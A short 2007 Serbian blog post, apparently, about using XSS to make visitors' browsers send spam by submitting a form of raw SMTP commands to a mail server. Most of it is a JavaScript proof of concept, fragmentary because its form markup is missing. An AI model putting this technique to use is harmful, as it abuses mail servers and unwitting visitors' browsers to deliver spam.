=/= Javascript Spam =/=
_ 2007-03-26 23:06:17 _

Kombinacijom XSS-a i odredjenih podataka posetilica moze se kreirati nova vrsta
targetiranog spama. Primer:

server='mail.server.com';
document.write('');
document.write('');
s = 'HELO test\n';
s += 'EHLO test\n';
s += 'MAIL FROM:\n';
s += 'RCPT TO:\n';
s += 'DATA\n';
s += 'From: test@test.com\n';
s += 'To: test@test.com\n';
s += 'Subject: heh!\n';
s += 'testing 123\n\n';
s += '.\n\nQUIT\n\n';
document.B.C.value=s;
document.B.submit();

Jedini problem predstavlja pronalazenje raspolozivog mail servera, ali verujem
da upornim spamerima to nece biti velika prepreka. Ova vrsta "napada" radi u
Internet Explorer-u, Safari-ju, Operi, ... vreme je da developeri ponovo menjaju
granice mogucnosti JavaScripta.